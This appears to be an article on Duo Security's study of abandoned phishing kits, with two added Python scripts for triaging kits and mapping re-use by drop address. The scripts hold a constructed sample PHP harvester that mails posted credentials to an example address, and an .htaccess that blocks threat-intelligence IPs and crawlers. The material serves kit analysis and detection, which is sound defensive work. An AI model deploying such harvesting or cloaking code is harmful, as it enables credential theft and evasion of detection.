The people behind phishing attacks are always looking for ways to improve their profitability. They quite often re-use material by bundling site resources into a phishing kit, uploading that kit to a server and sending a new batch of emails.
Sometimes, though, they get careless and leave the kits behind, allowing them to be analyzed. Trusted access specialist Duo Security carried out a month-long experiment to track down these abandoned kits.
Over the course of the study it found more than 3,200 unique phishing kits, tracked the actors behind the kits, identified kit re-use across sites and more. To create a new phishing site, attackers first clone the legitimate site they want to spoof, then change the login form to point to a simple PHP script. The script then collects credentials and either emails them to the attacker or logs them to a text file.
Duo studied 66,000 URLs from threat intelligence sites and found more than 7,800 phishing kits. This indicates that multiple URLs with different paths are occasionally submitted to the threat intelligence aggregators resulting in the same kit being discovered multiple times, and that some phishing kits are reused across multiple sites.
In an effort to avoid detection, the criminals frequently add a .htaccess file to the phishing kit that blocks connections based on HTTP request attributes, for example denying IP ranges that belong to threat intelligence services.
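The three kit characteristics described above (a harvesting script that reads the posted form and mails or logs it, re-uploads of the same kit under different URLs, and an .htaccess that turns scanners away) are exactly what an analyst checks first when an abandoned kit is recovered. The following triage script is an added example written for this page; it is not Duo's tooling and not code from the report. It takes the extracted kit as a mapping of file path to contents, and the sample kit it runs on is constructed for illustration (the address and IP ranges are reserved example values, not indicators from the study).

```python
"""Triage of a recovered phishing kit (added example, constructed sample data).

Input is a dict of relative path -> file contents, as produced by walking an
extracted kit archive. Nothing here is real kit material.
"""
import hashlib
import ipaddress
import re

# Constructed sample kit: cloned login page, harvesting script, and an
# .htaccess that blocks some scanners. Values are reserved example addresses.
SAMPLE_KIT = {
    "login.html": '<form method="post" action="post.php"> ... </form>',
    "post.php": (
        "<?php\n"
        "$user = $_POST['email']; $pass = $_POST['password'];\n"
        "$msg = \"User: $user\\nPass: $pass\\n\";\n"
        "mail('dropbox-example@example.com', 'Result', $msg);\n"
        "file_put_contents('rezult.txt', $msg, FILE_APPEND);\n"
        "header('Location: https://legit.example/login');\n"
    ),
    ".htaccess": (
        "order allow,deny\n"
        "deny from 192.0.2.0/24\n"
        "deny from 198.51.100.7\n"
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_USER_AGENT} (googlebot|phishtank) [NC]\n"
        "RewriteRule .* - [F]\n"
        "allow from all\n"
    ),
}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
DENY_RE = re.compile(r"^\s*deny\s+from\s+(\S+)", re.IGNORECASE | re.MULTILINE)
UA_COND_RE = re.compile(r"RewriteCond\s+%\{HTTP_USER_AGENT\}\s+(\S+)", re.IGNORECASE)

# Sinks that turn posted credentials into mail or a file on the host.
SINKS = ("mail(", "file_put_contents(", "fwrite(", "fopen(")


def find_harvesters(kit):
    """PHP files that read POST data and mail it out or write it to disk,
    together with the drop addresses they contain."""
    hits = {}
    for path, body in kit.items():
        if not path.endswith(".php") or "$_POST" not in body:
            continue
        sinks = [s for s in SINKS if s in body]
        if sinks:
            hits[path] = {"sinks": sinks, "emails": sorted(set(EMAIL_RE.findall(body)))}
    return hits


def blocked_networks(htaccess):
    """IP networks denied by 'deny from' lines (single hosts become /32)."""
    nets = []
    for token in DENY_RE.findall(htaccess):
        try:
            nets.append(ipaddress.ip_network(token, strict=False))
        except ValueError:
            pass  # hostnames or partial addresses: not resolved offline
    return nets


def blocked_user_agents(htaccess):
    """Regex patterns the kit matches against User-Agent before refusing."""
    return UA_COND_RE.findall(htaccess)


def scanner_is_blocked(htaccess, ip, user_agent):
    """Would a crawler coming from this IP / User-Agent be refused by the kit?
    Useful for explaining why a threat-intel fetch returned 403."""
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in blocked_networks(htaccess)):
        return True
    return any(re.search(p, user_agent, re.IGNORECASE) for p in blocked_user_agents(htaccess))


def kit_fingerprint(kit):
    """Hash over sorted file names and contents; identical fingerprints across
    hosts mean the same kit was re-uploaded rather than rebuilt."""
    h = hashlib.sha256()
    for path in sorted(kit):
        h.update(path.encode())
        h.update(b"\0")
        h.update(hashlib.sha256(kit[path].encode()).digest())
    return h.hexdigest()


if __name__ == "__main__":
    print(find_harvesters(SAMPLE_KIT))
    print([str(n) for n in blocked_networks(SAMPLE_KIT[".htaccess"])])
    print(scanner_is_blocked(SAMPLE_KIT[".htaccess"], "192.0.2.55", "Mozilla/5.0"))
    print(kit_fingerprint(SAMPLE_KIT))
```

Running `scanner_is_blocked` with the source address and User-Agent of your own collection infrastructure tells you whether a kit would have hidden its login page from you, which is one reason a URL flagged by one feed can look benign to another. The fingerprint deliberately includes the .htaccess so that two uploads of one kit with different blocklists are reported as different variants.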
Jordan Wright, R&D Engineer at Duo Security, says, “Hackers will trade phishing kits with one another so they don’t have to put in the work to build them themselves. We also found that many of these kits have a backdoor, where anyone — including the original creator of the kit — can come along and run commands on the host.”
The study also found that the hackers are targeting popular content management systems like WordPress, which make easy targets for attackers if they’re not kept up to date. The industry trend towards increased use of HTTPS is also extending into phishing sites, with over 16 percent of recorded samples served over HTTPS, exploiting users’ trust in the ‘secure’ browser indication.
“We also wanted to track the people behind the kits,” adds Wright. “In many instances you can see multiple email addresses connected to the same phishing kit, allowing us to map out the landscape of which hackers are doing which campaigns. This helps us figure out what’s going on and who’s behind it. In another instance we found one email address in 115 unique phishing kits, showing that they’re being adapted, changed and re-used.”
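The mapping Wright describes, from drop addresses to kits and from kits to the addresses that have been swapped into them, comes down to two indexes over the recovered scripts. The script below is an added example for this page, not Duo's code; the kit records are constructed, with reserved example hosts and addresses rather than indicators from the report. Its `family_hash` blanks out the email addresses before hashing, so two copies of one harvesting script that differ only in where results are sent land in the same family, which is how "one address in 115 kits" and "several addresses in one kit" both become visible.

```python
"""Mapping kit re-use and the addresses behind it (added example, constructed data)."""
import hashlib
import re
from collections import defaultdict

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def family_hash(php_source):
    """Hash of a harvesting script with the exfil addresses replaced, so two
    copies of one kit that differ only in their drop address collide."""
    normalised = EMAIL_RE.sub("<EMAIL>", php_source)
    normalised = re.sub(r"\s+", " ", normalised).strip()
    return hashlib.sha256(normalised.encode()).hexdigest()[:16]


# Constructed records, one per kit recovered from a phishing host. The hosts
# and addresses are reserved example values, not indicators from the study.
KITS = [
    {"host": "phish-a.example", "script": "<?php mail('one@example.net', 's', $_POST['p']);"},
    {"host": "phish-b.example", "script": "<?php mail('one@example.net', 's', $_POST['p']);"},
    {"host": "phish-c.example", "script": "<?php mail('two@example.org', 's', $_POST['p']);"},
    {"host": "phish-d.example", "script": (
        "<?php $r = $_POST; mail('one@example.net', 'x', $r['p']);"
        " mail('three@example.org', 'x', $r['p']);")},
]


def index_kits(records):
    """Build address -> hosts, family -> addresses and family -> hosts maps."""
    by_email = defaultdict(set)
    by_family = defaultdict(set)
    family_hosts = defaultdict(set)
    for rec in records:
        fam = family_hash(rec["script"])
        family_hosts[fam].add(rec["host"])
        for email in set(EMAIL_RE.findall(rec["script"])):
            by_email[email].add(rec["host"])
            by_family[fam].add(email)
    tidy = lambda d: {k: sorted(v) for k, v in d.items()}
    return tidy(by_email), tidy(by_family), tidy(family_hosts)


def most_reused_address(records):
    """The drop address seen on the most hosts, and those hosts."""
    by_email, _, _ = index_kits(records)
    email, hosts = max(by_email.items(), key=lambda kv: len(kv[1]))
    return email, hosts


if __name__ == "__main__":
    by_email, by_family, family_hosts = index_kits(KITS)
    print("addresses:", by_email)
    print("addresses per kit family:", by_family)
    print("hosts per kit family:", family_hosts)
    print("most reused:", most_reused_address(KITS))
```

On the constructed records the first three kits form one family (same script, two different addresses), while the fourth is a separate family that shares an address with the first; on a real corpus that shared address is the link that lets one campaign be tied to kits it did not originally come with.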
You can find out more about the analysis and download the full report on the Duo blog.